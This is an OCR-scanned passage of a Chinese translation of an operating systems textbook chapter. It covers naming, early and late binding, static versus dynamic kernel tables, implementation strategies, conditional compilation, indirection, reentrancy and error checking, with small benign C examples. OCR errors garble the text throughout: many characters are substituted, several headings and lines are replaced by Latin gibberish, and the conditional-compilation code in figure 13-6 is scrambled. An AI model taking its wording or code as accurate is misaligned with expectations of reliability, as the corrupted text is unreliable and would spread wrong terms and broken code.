符 串 名 字 供 人 们 使 用 。 此 外 ， 儿 乎 总 是 存在 一 个 内 部 名 字 由 系统 使 
用 。 在 UNIX 中 ， 文 件 的 实际 名 字 是 它 的 i 贡 点 号 ， 在 内 部 根本 束 不 使 用 


ASCII 名 字 。 实 际 上 ， 它 甚至 不 是 惟一 的 ， 因 为 一 个 文件 可 能 具有 多 个 
链接 指向 它 。 在 Windows Vista 中 ， 相 仿 的 内 部 名 字 是 MFT 中 文件 的 索 
引 。 目 录 的 任务 是 在 外 部 名 字 和 内 部 名 字 之 间 提 供 映 射 ， 如 图 13-4 所 
Fee 


外 部 名 字 : /usr/ast/books/mos2/Chap-12 


- eth I =e 
an" /ust/ast/books/mos2 i ae 


Chap-10 7 
| Chap-11 | 38 | ‘ 
Chap-12 5 
4 
3 内 部 名 字 : 2 
2 
1 


图 13-4 目 孙 用 来 将 外 部 名 字 映 射 到 内 部 名 字 上 


在 许多 情况 下 〈 例 如 上 面 给 出 的 文件 名 的 例子 ) ， 内 部 名 字 是 一 
个 无 符号 整数 ， 用 作 进 入 一 个 内 部 表格 的 索引 。 表 格 -索引 名 字 的 其 他 
例子 还 有 UNIX 中 的 文件 描述 符 和 Windows Vista 中 的 对 象 句柄 。 注 意 这 
些 都 没有 任何 外 部 表示 ， 它 们 严格 地 被 系 统 和 运行 的 进程 所 使 用 。 一 
般 而 言 ， 对 于 当 系 统 重新 启动 时 就 会 丢失 的 暂时 的 名 字 ， 使 用 表格 索 
引 是 一 个 很 好 的 主意 。 


操作 系统 经 常 支持 多 个 名 字 空 间 ， 既 在 内 部 义 在 外 部 。 例 如 ， 在 
第 11 章 我 们 了 解 了 Windows Vista 文 持 的 三 个 外 部 名 字 空 间 :， 文件 名 、 


对 象 名 和 注册 表 名 〈 并 且 还 有 我 们 没有 考虑 的 活动 目录 名 ) 。 此 外 ， 
还 存在 着 使 用 无 符号 整数 的 数 不 清 的 内 部 名 字 空 间 ， 例 如 对 象 句 柄 、 
MEFT 项 等 。 尽 管 外 部 名 字 空 间 中 的 名 字 都 是 Unicode 字 符 串 ， 但 是 在 注 
册 表 中 查寻 一 个 文件 名 是 不 可 以 的 ， 正 如 在 对 象 表 中 使 用 MFT 索 引 是 
不 可 以 的 。 在 一 个 良好 的 设计 中 ， 相 当 多 的 考虑 花 在 了 需要 多 少 个 名 
FSA, BENG FS PS SRT A, CORE, ERF 
在 抽象 的 和 相对 的 名 字 ， 如 此 等 等 。 


13.3.5 ABERE 


正如 我 们 刚刚 看 到 的 ， 操 作 系 统 使 用 多 种 类 型 的 名 字 来 引用 对 
象 。 有 时 在 名 字 和 对 象 之 间 的 映射 是 固定 的 ,但 是 有 时 不 是 。 在 后 一 
种 情况 下 ， 何 时 将 名 字 与 对 象 绑 定 可 能 是 很 重要 的 。 一 般 而 言 ， 早 期 
绑 定 (early binding) 是 简单 的 ， 但 是 不 灵活 ， 而 晚期 绑 定 (ate 
binding) 则 比较 复杂 ， 但 是 通常 更 加 灵活 。 


为 了 痔 明 绑 定 时 机 的 概念 ， 让 我 们 看 一 看 某 些 现实 世界 的 例子 。 
早期 绑 定 的 一 个 例子 是 某 些 高 等 学 校 允许 父母 在 归 儿 出 生 时 登记 入 
学 ， 并 且 预 付 当 前 的 学 费 。 以 后 当 学 生长 大 到 18 岁 时 ， 学 费 已 经 全 部 
付 清 ， 无 论 此 刻 学 费 有 多 么 高 。 


在 制造 业 中 ， 预 允 定 购 零 部 件 并 且 维 持 夫 部 件 的 库存 量 是 早期 绑 
定 。 相 反 ， 即 时 制造 要 求 供 货 商 能 够 立刻 提供 零 部 件 ， 不 需要 事 允 通 


知 。 这 就 是 晚期 绑 定 。 


程序 设计 语言 对 于 变量 通常 文 持 多 种 绑 定时 机 。 编 译 右 将 全 局 变 
量 绑 定 到 符 殊 的 虚拟 地 址 ， 这 年 早期 绑 定 的 例 和 于。 过程 的 局 部 变量 在 
过 程 被 调用 的 时 刻 (在 栈 中 ) 分 配 一 个 虚拟 地 址 ， 这 是 中 间 绑 定 。 存 
放 在 堆 中 的 变量 \ 这 些 变量 由 C 中 的 malloc 或 Java 中 的 new 分 配 ) 仅仅 
在 它们 实际 被 使 用 的 时 候 才 分 配 虚 拟 地 址 ， 这 便 是 晚期 绑 定 。 
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活性 也 使 用 晚期 绑 定 。 内 存 分 配 是 一 个 相关 的 和 案例。 在 缺乏 地 址 重 定 
位 硬件 的 机 器 上 ， 早 期 的 多 道 程序 设计 系统 不 得 不 在 某 个 内 存 地 址 装 
载 一 个 程序 ， 并 且 对 其 重 定位 以 便 在 此 处 运行 。 如 有 果 它 曾经 被 交换 出 
去 ， 那 么 它 束 必 须 装 回 到 相同 的 内 存 地 址 ， 否 则 就 会 出 错 。 相 反 ， 页 
式 虚 拟 内 存 征 晚期 绑 定 的 一 种 形式 。 在 页 面 被 访问 并 且 实 际 装 入 内 存 
之 前 ， 与 一 个 给 定 的 虚拟 地 址 相对 应 的 实际 物理 地 址 是 不 知道 的 。 


昂 期 绑 定 的 妨 一 个 例子 是 GUI 中 窗口 的 放置 。 在 早期 图 形 系统 
中 ， 程 序 员 必 须 为 屏 磋 上 的 所 有 图 像 设 定 绝 对 屏幕 坐标 ， 与 此 相对 
照 ， 在 现代 GUI 中 ， 软 件 使 用 相对 于 窗口 原点 的 坐标 ,但 是 在 窗口 被 
放置 在 屏幕 上 之 前 该 坐标 是 不 确定 的 ， 并 且 以 后 ， 它 甚至 是 可 能 改变 
的 。 


13.3.6 ”前 仿 与 动态 结构 
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一 个 固定 的 数组 ， 存 放 每 个 进程 结构 。 如 采 进 程 表 由 256 项 组 成 ， 那 么 
在 任意 时 刻 只 能 存在 256 个 进程 。 试 图 创建 第 257 个 进程 将 会 失败 ， 因 
为 缺乏 表 空 间 。 类 似 的 考虑 对 于 打开 的 文件 表 (每 个 用 户 的 和 系统 范 
围 的 ) 以 及 许多 其 他 内 核 表 格 也 是 有 效 的 。 


一 个 蔡 代 的 策略 是 将 进程 表 建 立 为 一 个 小 型 表 的 链表 ， 最 初 只 有 
一 个 表 。 如 采 该 表 被 填 满 ， 可 以 从 全 局 存储 池 中 分 配 另 一 个 表 并 且 将 
其 链接 到 前 一 个 表 。 这 样 ， 在 全 部 内 核 内 存 个 耗 尽 之 前 ， 进 程 表 不 可 
能 被 十 满 。 


另 一 方面 ， 搜 索 表 格 的 代码 会 变 得 更 加 复杂 。 例 如 ， 在 岁 13-5 中 给 
出 了 搜索 一 个 静态 进程 表 以 碍 找 给 定 PID ，pid 的 代码 。 该 代码 和 商 单 有 
效 。 对 于 小 型 表 的 链表 ， 做 同样 的 搜索 则 需要 更 多 的 工作 。 


found = 0; 
for (p = &proc_table[0]; p < &proc_table[PROC_TABLE_ SIZE]; p++) { 
if (p->proc_pid == pid) { 


found = 1; 
break; 
} 
} 


图 13-5 对 于 给 定 PID 搜 索 进 程 表 的 代码 


当 存在 大 量 的 内 存 或 者 当 表 的 利用 可 以 猜测 得 相当 准确 时 ， 静 态 
表 是 最 佳 的 。 例 如 ， 在 一 个 单 用 户 系统 中 ， 用 户 不 太 可 能 立刻 局 动 64 
个 以 上 的 进程 ， 并 且 如 采 试 图 局 动 第 65 个 进程 失败 了 ， 也 并 不 是 一 个 
彻 改 的 灾难 。 


还 有 另 一 种 选择 是 使 用 一 个 固定 大 小 的 表 ， 但 是 如 时 该 表 填 满 
了 ， 殊 分 配 一 个 新 的 固定 大 小 的 表 ， 比 方 说 大 小 是 原来 的 两 倍 。 然 后 
将 当前 的 表 项 复制 到 新 表 中 并 且 把 旧 表 返 回 空 朵 存储 池 。 这 样 ， 表 总 
征 连 续 的 而 不 是 链接 的 。 此 处 的 缺点 是 需要 某 些 存储 管理 ， 并 且 现 在 
表 的 地 址 是 变量 而 不 是 第 量 。 


对 于 内 核 栈 也 存在 类 似 的 问题 。 当 一 个 线程 切换 到 内 核 模式 ， 或 
者 当 一 个 内 核 模式 线程 运行 时 ， 它 在 内 核 空间 中 需要 一 个 栈 。 对 于 用 
户 线程 ， 栈 可 以 初始 化 成 从 虚拟 地 址 空间 的 顶部 向 下 生长 ， 所 以 大 小 
不 需要 预 匈 设 定 。 对 于 内 核 线程 ， 大 小 必须 预 驳 设 定 ， 因 为 栈 占据 了 


某 些 内 核 虚 拟 地 址 空间 并 且 可 能 存在 许多 栈 。 问 题 是 :每 个 栈 应 该 得 
到 多 少 空间 ? 此 处 的 权衡 与 进程 表 是 类 似 的 。 


另 一 个 静态 -动态 权衡 是 进程 调度 。 在 某 些 系统 中 ， 特 别 是 在 实时 
系统 中 ， 调 度 可 以 预先 静态 地 完成 。 例 如 ， 航 空 公司 在 班机 局 航 前 几 
周 束 知 道 它 的 飞机 什么 时 候 要 出 发 。 RM, SRA ATCA 
时 调度 音频 、 视 频 和 其 他 进程 。 对 于 通用 的 应 用 ， 这 些 考虑 是 不 成 立 
的 ， 并 且 调 度 必 须 是 动态 的 。 


还 有 一 个 静态 -动态 问题 是 内 核 结 构 。 如 果 内 核 作为 单一 的 二 进 制 
程序 建立 并 且 装 载 到 内 存 中 运行 ， 情 况 是 比较 简单 的 。 然 而 ， 这 一 设 
计 的 结果 是 添加 一 个 新 的 VO 设备 束 需 要 将 内 核 与 新 的 设备 驱动 程序 重 
新 链接 。UNIX 的 早期 版 本 整 古 以 这 种 方式 工作 的 ， 在 小 型 计算 机 环境 
中 它 相当 令 人 满意 ， 那 时 添加 新 的 VO 设备 是 十 分 罕见 的 事情 。 如 今 ， 
大 多 数 操作 系统 允许 将 代码 动态 地 添加 a 到 内 核 之 中 ， 随 之 而 来 的 则 是 
所 有 额外 的 复 洒 性 。 


13.3.7 和 目 顶 同 下 与 目 故 同上 的 实现 


里 然 最 好 钙 目 顶 癌 下 地 设计 系统 ， 但 是 在 理论 上 系统 可 以 目 顶 回 
下 或 者 目 拘 同上 地 实现 。 在 目 顶 同 下 的 实现 中 ， 实 现 者 以 系统 调用 处 
理 程序 为 开端 ， 并 且 探 究 需 要 什么 机 制 和 数据 结构 来 支持 它们 。 接 着 
编写 这 些 过 程 等 ， 直 到 触及 硬件 。 


这 种 方法 的 问题 症 ， 由 于 只 有 顶层 过 程 可 用 ， 任 何事 情 都 难于 测 
试 。 出 于 这 样 的 原因 ， 许 多 开发 人 员 发 现实 际 上 目 底 同上 地 构建 系统 
更 加 可 行 。 这 一 方法 需要 首先 编写 隐藏 确 层 硬件 的 代码 ， 符 别 是 图 11- 
6 中 的 HAL。 中 断 处 理 程序 和 时 钟 驱动 程序 也 是 早期 就 需要 的 。 


然后 ， 可 以 使 用 一 个 简单 的 调度 器 (例如 轮转 调度 ) 来 解决 多 道 
程序 设计 问题 。 在 这 一 时 刻 ， 测 试 系统 以 了 解 它 是 否 能 够 正确 地 运行 
多 个 进程 应 该 是 可 能 的 。 如 采 运 转正 前 ， 此 时 可 以 开始 仔细 地 定义 贯 
穿 系统 的 各 种 各 样 的 表格 和 数据 结构 ， 符 别 是 那些 用 于 进程 和 线程 管 
理 以 及 后 面 内 存 管 理 的 表格 与 数据 结构 。I/O 和 文件 系统 在 最 初 可 以 等 
一 等 ， 用 于 测试 和 调试 目的 的 读 键 盘 与 写 屏 幕 的 基本 方法 除外 。 在 某 
些 情况 下 ， 关 键 的 低层 数据 结构 应 该 得 到 保护 ， 这 可 以 通过 只 人 允许 经 
由 特定 的 访问 过 程 来 访问 而 实现 一 一 实际 上 这 古 面 同 对 象 的 程序 设计 
思想 ， 不 论 采 用 何 种 程序 设计 语言 。 当 较 低 的 层次 完成 时 ， 可 以 彻底 


地 测 斌 它们。 这样， 系统 目 底 向 上 推进 ， 很 像 旦 建筑 商 建造 高 层 办 公 
楼 的 方式 。 


如 采 有 一 个 大 型 团队 可 用 ， 那 么 蔡 代 的 方法 是 首先 做 出 整个 系统 
的 评 细 设计 ， 然 后 分 配 不 同 的 小 组 编写 不 同 的 模块 。 每 个 小 组 独立 地 
测试 自己 的 工作 。 当 所 有 的 部 分 都 准备 好 时 ， 可 以 将 它们 集成 起 来 并 
加 以 测试 。 这 一 设计 方式 存在 的 问题 是 ， 如 果 最 初 没有 什么 可 以 运 
转 ， 可 能 难于 分 离 出 一 个 或 多 个 模块 是 否 工作 不 正常 ， 或 者 一 个 小 组 
征 否 误解 了 某 些 其 他 模块 应 该 做 的 事情 。 尽 管 如 此 ， 如 有 果 有 大 型 团 
队 ， 还 是 经 党 使 用 该 方法 使 程序 设计 工作 中 的 并 行程 度 最 大 化 。 


13.3.8 ”实用 技术 


我 们 刚刚 了 解 了 系统 设计 与 实现 的 某 些 抽象 思想 ， 现 在 将 针对 系 
统 实现 考察 一 些 有 用 的 具体 技术 。 这 方面 的 技术 很 多 ， 但 是 骗 幅 的 限 
制 使 我 们 只 能 介绍 其 中 的 少数 技术 。 


1. 隐 藏 硬件 


许多 硬件 是 十 分 麻烦 的 ， 所 以 只 好 尽早 将 其 隐藏 起 来 (除非 它 要 
展现 能 力 ， 而 大 多 数 硬件 不 会 这 样 ) 。 某 些 非 常 低层 的 细节 可 以 通过 
如 图 13-2 所 示 的 HAL 类 型 的 层次 得 到 隐藏 。 然 而 ， 许 多 硬件 细 记 不 能 
以 这 样 的 方式 来 隐藏 。 


值得 尽早 关注 的 一 件 事情 是 如 何 处 理 中 断 。 中 断 使 得 程序 设计 令 
人 不 恰 快 ， 但 是 操作 系统 必须 对 它们 进行 处 理 。 一 种 方法 是 立刻 将 中 
断 转 变 成 别 的 东西 ， 例 如， 每 个 中 断 都 可 以 转变 成 即时 弹出 的 线程 。 
在 这 一 时 刻 ， 我 们 处 理 的 是 线程 ， 而 不 是 中 断 。 


第 二 种 方法 是 将 每 个 中 断 转 换 成 在 一 个 互 不 量 上 的 unlock 操 作 ， 该 
互 不 量 对 应 正在 等 得 的 驱动 程序 。 于 是 ， 中 断 的 惟一 效果 就 是 导致 菏 
个 线程 变 为 束 绪 。 
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码 只 走 构 造 一 个 表明 中 断 来 目 何 处 的 消 轧 ， 将 其 排 入 队列 ， 并 且 调用 
调度 器 以 (潜在 地 ) 运行 处 理 程序 ， 而 处 理 程序 可 能 正在 阻塞 等 待 该 
消 思 。 所 有 这 些 扩 术 ， 以 及 其 他 类 似 的 技术 ， 都 试图 将 中 断 转 换 成 线 
程 同步 操作 。 让 每 个 中 断 由 一 个 适当 的 线程 在 适当 的 上 下 文中 处 理 ， 
比 起 在 中 断 碰巧 发 生 的 随意 上 下 文中 运行 处 理 程序 ， 前 者 要 更 加 容易 
管理 。 当 然 ， 这 必须 高 效率 地 进行 ， 而 在 操作 系统 内 部 深 人 处， 一 切 都 
必须 高 效率 地 进行 。 


大 多 数 操作 系统 被 设计 成 运行 在 多 个 人 硬件 平台 上 。 这 些 平台 可 以 
按照 CPU 芯 片 、MMU、 字 长 、RAM 大 小 以 及 不 能 容易 地 由 HAL 或 等 价 
物 屏蔽 的 其 他 特性 来 区 分 。 尽 管 如 此 ， 人 们 高 度 期 望 拥 有 单一 的 一 组 
源 文件 用 来 生成 所 有 的 版 本 ， 否 则 ， 后 来 发 现 的 每 个 程序 错误 必须 在 
多 个 源 文 件 中 修改 多 次 ， 从 而 有 源 文 件 逐 渐 芷 远 的 危险 。 


某 些 硬件 的 差异 ， 例 如 RAM 大 小 ， 可 以 通过 让 操作 系统 在 引导 的 
时 候 确 定 其 取 值 并 且 保 存在 一 个 变量 中 来 处 理 。 内 存 分 配 郁 可 以 利用 
RAM 大 小 变量 来 确定 构造 多 大 的 数据 块 高 速 缓存 、 页 表 等 。 甚 至 静态 
的 表格 ， 如 进程 表 ， 也 可 以 基于 尽 的 可 用 内 存 来 确定 大 小 。 


然而 ， 其 他 的 差异 ， 例 如 不 同 的 CPU 忌 厂 ， 就 不 能 让 单一 的 二 进 
制 代码 在 运行 的 时 候 确 定 它 正在 哪 一 个 CPU 上 运行 。 解 决 一 个 源 代码 
多 个 目标 机 的 问题 的 一 种 方法 旦 使 用 条 件 编译 。 在 源 文 件 中 ， 定 义 了 


一 定 的 编译 时 标志 用 于 不 同 的 配置 ， 并 且 这 些 标志 用 来 将 独立 于 
CPU、 字 长 、MMU 等 的 代码 用 括号 括 起 。 例 如 ， 设 想 一 个 操作 系统 运 
行 在 Pentium 和 UltraSPARC 必 族 上 ， 这 就 需要 不 同 的 初始 化 代码 。 可 以 
像 图 13-6a 中 那样 编写 init 过 程 的 代码 。 根 据 CPU 的 取 值 该 值 定义 在 头 
文件 config.h 中 ) ， 实 现 一 种 初始 化 或 其 他 的 初始 化 过 程 。 由 于 实际 的 
二 进 制 代码 只 包含 目标 机 所 需要 的 代码 ， 这 样 就 不 会 损失 效率 。 


#include "config.h" #include "config.h" 
init( ) #if (WORD_LENGTH == 32) 


{ typedef int Register; 

#if (CPU == PENTIUM) #endif 

/* SE Ab ze Pentium hi H 6 14*/ 

#endif #if (WORD _LENGTH == 64) 
typedef long Register; 

#if (CPU == ULTRASPARC) #endif 

/* He Ab fe UltraSPARC) 4) a 14 */ 

#endif Register RO, R1, R2, R3; 

} 


a) b) 
图 13-6 a) 依 赖 CPU 的 条 件 编译 ，b) 依 赖 字 长 的 条 件 编译 


第 二 个 例子 ， 假 设 需 要 一 个 数据 类 型 Register， 它 在 Pentium 上 是 32 
位 ， 在 UltraSPARC 上 是 64 位 。 这 可 以 由 图 13-6b 中 的 条 件 代码 来 处 理 
(假设 编译 器 产生 32 位 的 int 和 64 位 的 long) 。 一 旦 做 出 这 样 的 定义 (可 
能 是 在 别 的 什么 地 方 的 头 文件 中 ) ， 程 序 员 就 可 以 只 需 声明 变量 为 
Register 类 型 并 且 确 信 它 们 将 具有 正确 的 长 度 。 


当然 ， 头 文件 config.h 必 须 正 确 地 定义 。 对 于 Pentium 处 理 屡 ， 它 大 
概 是 这 样 的 : 


#define CPU PENTIUM 
#define WORD_LENGTH 32 


为 了 编译 针对 UltraSPARC 的 系统 ， 应 该 使 用 不 同 的 config.h， 其 中 
具有 针对 UltraSPARC 的 正确 取 值 ， 它 或 许 是 这 样 的 : 


#define CPU ULTRASPARC 
#define WORD_LENGTH 64 


一 些 读者 可 能 奇怪 为 什么 CPU 和 WORD _LENGTH 用 不 同 的 宏 来 处 
理 。 我 们 可 以 很 容易 地 用 针对 CPU 的 测试 而 将 Register 的 定义 用 括号 括 
起 ， 对 于 Pentium 将 其 设置 为 ?32 位 ， 对 于 UltraSPARC 将 其 设置 为 64 位 。 
然而 ， 这 并 不 是 一 个 好 主意 。 考 虑 一 下 以 后 当 我 们 将 系统 移植 到 64 位 
Intel Itanium 处 理 融 时 会 发 生 什 么 事情 。 我 们 可 能 不 得 不 为 了 Itanium 而 
在 图 13-6b 中 添加 第 三 个 条 件 。 通 过 像 上 面 那 样 定 义 宏 ， 我 们 要 做 的 全 
部 事情 是 在 config.h 文 件 中 为 Itanium 处 理 器 包含 如 下 的 代码 行 : 


#define WORD_LENGTH 64 


这 个 例子 例证 了 前 面 讨论 过 的 正 交 性 原则 。 那 些 依赖 CPU 的 细节 
应 该 基于 CPU 宏 而 条 件 编 译 ， 而 那些 依赖 字 长 的 细 市 则 应 该 使 用 
WORD_LENGTH 宏 。 类 似 的 考 虚 对 于 许多 其 他 参数 也 是 适用 的 。 


2. 间 接 


人 们 不 时 地 说 在 计算 机 科学 中 没有 什么 问题 不 能 通过 男 一 个 层次 
间接 得 到 解决 。 虽 然 有 些 伟 大 其 词 ， 但 是 其 中 的 确 存在 一 定 程 度 的 真 
实 性 。 让 我 们 考虑 一 些 例子 。 在 基于 Pentium 的 系统 上 ， 当 一 个 健 被 按 
下 时 ， 硬 件 将 生成 一 个 中 断 并 且 将 键 的 编号 而 不 是 ASCII 字 符 编 码 送 到 
一 个 设备 寄存 器 中 。 此 外 ， 当 此 键 后 来 补 释 放 时 ， 第 二 个 中 断 生 成 ， 
同样 伴随 一 个 键 编号 。 间接 为 操作 系统 使 用 键 编号 作为 索引 检索 一 张 
表格 以 获取 ASCII 字 竺 提供 了 可 能 ， 这 使 得 处 理 世 界 上 不 同 国家 使 用 的 
许多 键盘 十 分 容易 。 获 得 按 下 与 释放 两 个 信息 使 得 将 任何 键 作为 换 档 
键 成 为 可 能 ， 因 为 操作 系统 知道 键 按 下 与 释放 的 准确 序列 。 


间接 还 被 用 在 输出 上 。 程 序 可 以 写 ASCII 字 符 到 屏幕 上 ， 但 是 这 些 
字符 被 解释 为 针对 当前 输出 字体 的 一 张 表 格 的 索引 。 表 项 包 侣 字符 的 
位 图 。 这 一 间接 使 得 将 字符 与 字体 相 分 离 成 为 可 能 。 


间接 的 另 一 个 例子 是 UNIX 中 主 设备 号 的 使 用 。 在 内 核 内 部 ， 有 一 
张 表格 以 块 设备 的 主 设备 号 作为 索引 ， 还 有 另 一 张 表 格 用 于 字符 设 
备 。 当 一 个 进程 打开 一 个 特定 的 文件 (例如 /dev/hd0) 时 ， 系 统 从 i 市 点 
提取 出 类 型 ( 块 设备 或 字符 设备 ) 和 主 副 设备 号 ， 并 且 检 索 适 当 的 驱 
动 程序 表 以 找到 驱动 程序 。 这 一 间接 使 得 重新 配置 系统 十 分 容易 ， 因 
为 程序 涉及 的 是 符号 化 的 设备 名 ， 而 不 是 实际 的 驱动 程序 名 。 
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个 邮箱 而 不 是 一 个 进程 作为 消息 的 目的 地 。 通 过 间接 使 用 邮箱 (而 不 
是 指定 一 个 进程 作为 目的 地 ) ， 能 够 获得 相当 可 观 的 灵活 性 (例如 ， 
让 一 位 秘书 处 理 她 的 老板 的 消息 ) 。 


在 某 种 意义 上 ， 使 用 诸如 


#define PROC_TABLE_SIZE 256 


的 宏 也 是 间接 的 一 种 形式 ， 因 为 程序 员 无 须知 道 表格 实际 有 多 大 
就 可 以 编写 代码 。 一 个 民 好 的 习惯 是 为 所 有 的 常量 提供 符号 化 的 名 字 
(有 时 -1、0 和 1 除外 ) ， 并 且 将 它们 放 在 头 文件 中 ， 同 时 提供 注释 解释 
ELM A 


3. 可 重用 性 


在 略微 不 同 的 上 下 文中 重用 相同 的 代码 通 浓 是 可 行 的 。 这 样 做 是 
一 个 很 好 的 想法 ， 因 为 它 减少 了 二 进 制 代 码 的 大 小 并 且 意 味 着 代码 只 
需要 调 斌 一次。 例如， 假设 用 位 图 来 跟踪 磁 副 上 的 空间 块 。 人 磁盘 块 管 
理 可 以 通过 提供 管理 位 图 的 过 程 alloc 和 free 得 到 人 处理。 


在 最 低 限 度 上 ， 这 些 过 程 应 该 对 任何 磁盘 起 作用 。 但 是 我 们 可 以 
比 这 更 进一步 。 相 同 的 过 程 还 可 以 用 于 管理 内 存 块 、 文 件 系 统 块 高 速 


缓存 中 的 块 ， 以 及 节点。 事实 上 ， 它 们 可 以 用 来 分 配 与 回收 能 够 线性 
编号 的 任意 资源 。 


JEA 
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上 ， 总 是 存在 着 这 样 的 危险 : 当 一 个 CPU 执行 某 个 过 程 时 ， 另 一 个 
CPU 在 第 一 个 完成 之 前 也 开始 执行 它 。 在 这 种 情况 下 ， 不 同 CPU 上 的 
两 个 (或 多 个 ) 线程 可 能 在 同时 执行 相同 的 代码 。 这 种 情况 必须 通过 
使 用 互 不 量 或 者 某 些 其 他 保护 临界 区 的 方法 进行 处 理 。 


然而 ， 在 单 处 理 右 上 ， 问 题 也 走 存 在 的 。 特 别 地 ， 大 多 数 操作 系 
统 是 在 允许 中 断 的 情况 下 运行 的 。 否 则 ， 将 丢失 许多 中 断 并 且 使 系统 
不 可 靠 。 当 操作 系统 忙于 执行 茶 个 过 程 P 时 ， 完 全 有 可 能 发 生 一 个 中 断 
并 且 中 断 处 理 程 序 也 调用 P。 如 果 P 的 数据 结构 在 中 断 发生 的 时 刻 处 于 
不 一 致 的 状态 ， 中 断 处 理 程序 就 会 注意 到 它们 处 于 不 一 致 的 状态 并 且 
FM ° 


可 能 发 生 这 种 情况 的 一 个 显而易见 的 例子 是 P 是 调度 器 。 假 设 某 个 
进程 用 完了 它 的 时 间 配 额 ， 并 且 操 作 系 统 正 将 其 移动 到 其 队列 的 末 
尾 。 在 列表 处 理 的 半路 ， 中 断 发 生 了 ， 使 得 某 个 进程 就 绪 ， 并 且 运 行 
调度 器 。 由 于 队列 处 于 不 一 致 的 状态 ， 系 统 有 可 能 会 月 浇 。 因 此 ， 即 
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结构 用 互 斥 量 来 保护 ， 并 且 在 中 断 不 被 允许 的 时 刻 栓 用 中 断 。 


5. 诸 力 法 


使 用 蛮 力 法 解决 问题 多 年 以 来 获得 了 较 才 的 名 声 ， 但 十 依 据 商 单 
性 它 经 第 是 行 之 有 效 的 方法 。 每 个 操作 系统 部 有 许多 很 少 会 调用 的 过 
程 或 是 具有 很 少数 据 的 操作 ， 不 值得 对 它们 进行 优化 。 例 如 ， 在 系统 
内 部 经 常 有 必要 搜索 各 种 表格 和 数组 。 变 力 算法 只 是 让 表格 保持 表 项 
建立 时 的 顺序 ， 并 且 当 必须 查找 某 个 东西 时 线性 地 搜索 表格 。 如 果 表 
项 的 数目 很 少 (例如 少 于 1000 个 ) ， 对 表格 排序 或 建立 散 列表 的 好 处 
不 大 ， 但 是 代码 却 复杂 得 多 并 且 很 有 可 能 在 其 中 存在 错误 。 


当然 ， 对 处 于 关键 路 径 上 的 功能 ， 例 如 上 下 文 切换 ， 使 它们 加 快 
速度 的 一 切 措施 都 应 该 尽力 去 做 ， 即 使 可 能 要 用 汇编 语言 编写 它们 。 
但 是 ， 系 统 的 大 部 分 并 不 处 于 关键 路 径 上 。 例 如 ， 许 多 系统 调用 很 少 
被 调用 。 如 末 每 阳 1 秒 有 一 个 fork 调 用 ， 并 且 该 调用 人 花费 1 旱 秒 完成 ， 那 
么 即便 将 其 优化 到 花费 0 秒 也 不 过 仅 有 0.1% 的 获 益 。 如 琳 优 化 过 的 代码 
更 加 庞大 且 有 更 多 错误 ， 那 束 不 必 多 此 一 举 了 。 


6. 自 先 检查 错误 


由 于 各 种 各 样 的 原因 ， 许 多 系统 调用 可 能 潜在 地 会 失败 :要 打开 
的 文件 属于 他 人 ; 因为 进程 表 满 而 创建 进程 失败 ， 或 者 因为 目标 进程 


不 存在 而 使 信号 不 能 被 发 送 。 操 作 系统 在 执行 调用 之 前 必须 无 微 不 至 
地 检查 每 一 个 可 能 的 错误 。 


许多 系统 调用 还 需要 获得 资源 ， 例 如 进程 表 的 空位 、i 市 点 表 的 空 
位 或 文件 描述 符 。 一 般 性 的 建议 是 在 获得 资源 之 前 ， 首 先进 行 检 查 以 
了 解 系统 调用 能 否 实际 执行 ， 这 样 可 以 省 去 许多 麻烦 。 这 意味 着 ， 将 
所 有 的 测试 放 在 执行 系统 调用 的 过 程 的 开始 。 每 个 测试 应 该 具有 如 下 
的 形式 : 


if(error_condition)return(ERROR_CODE ) ; 


如 琳 调 用 通过 了 所 有 闫 格 的 测试 ， 那 么 束 可 以 肯定 它 将 会 取得 成 
功 。 在 这 一 时 刻 它 才能 获得 资源 。 


如 采 将 获得 资源 的 测试 分 散 开 ， 那 么 就 意味 着 如 果 在 这 一 过 程 中 
某 个 测试 失败 ， 到 这 一 时 刻 已 经 获得 的 所 有 资源 都 必须 归还 。 如 采 在 
这 里 发 生 了 一 个 错误 并 且 资 源 没有 被 归还 ， 可 能 并 不 会 立刻 发 生 破 
十。 例如， 一 个 进程 表 项 可 能 只 是 变 得 永久 地 不 可 用 。 然 而 ， 随 着 时 
间 的 流 泊 ， 这 一 差错 可 能 会 触发 多 次 。 最 终 ， 大 多 数 或 全 部 进程 表 项 
可 能 都 会 变 得 不 可 用 ， 导 致 系统 以 一 种 极度 不 可 预料 且 难 以 调试 的 方 


许多 系统 以 内 存 汇 漏 的 形式 遭受 了 这 一 问题 的 侵害 。 典 型 地 ， 程 
序 调用 malloc 分 配 了 空间 ， 但 是 以 后 态 记 了 调用 free 释 放 它 。 了 逐渐 地 ， 


所 有 的 内 存 都 消失 了 ， 直 到 系统 重新 局 动 。 


Engler 等 人 (2000) 推荐 了 一 种 有 趣 的 方法 在 编译 时 检查 某 些 这 样 
的 错误 。 他 们 注意 到 程序 员 知道 许多 定式 而 编译 器 并 不 知道 ， 例 如 当 
你 锁定 一 个 互 斥 量 的 时 候 ， 所 有 在 锁定 操作 处 开始 的 路 径 都 必须 包含 
一 个 解除 锁定 的 操作 并 且 在 相同 的 互 不 量 上 没有 更 多 的 锁定 。 他 们 设 
计 了 一 种 方法 让 程序 员 将 这 一 事实 告诉 编译 器 ， 并 且 指示 编译 器 在 编 
译 时 检查 所 有 路 径 以 发 现 对 定式 的 违犯 。 程 序 员 还 可 以 设 定 已 分 配 的 
内 存 必 须 在 所 有 路 径 上 释放 ， 以 及 设 定 许 多 其 他 的 条 件 。 


13.4 性 能 


所 有 事情 都 生平 等 的 ， 一 个 快速 的 操作 系统 比 一 个 慢 速 的 操作 系 
统 好 。 然 而 ， 一 个 快速 而 不 可 靠 的 操作 系统 还 不 如 一 个 慢 速 但 可 靠 的 
操作 系统 。 由 于 复杂 的 优化 经 常会 导致 程序 错误 ， 有 下 制 地 使 用 它们 
是 很 重要 的 。 尽 管 如 此 ， 在 性 能 是 至 关 重 要 的 地 方 进行 优化 还 是 值得 
的 。 在 下 面 几 节 我们 将 看 一 些 一 般 的 技术 ， 这 些 技术 在 特定 的 地 方 可 
以 用 来 改进 性 能 。 


13.4.1 操作 系统 为 什么 运行 缓慢 


在 讨论 优化 技术 之 前 ， 值 得 指出 的 是 许多 操作 系统 运行 缓慢 在 很 
大 程度 上 是 操作 系统 自 映 造成 的 。 例 如 ， 上 古老 的 操作 系统 ， 如 MGS- 
DOS 和 UNIX 版 本 7 在 几 秒 钟 内 就 可 以 启动 。 现 代 UNIX 系 统 和 Windows 
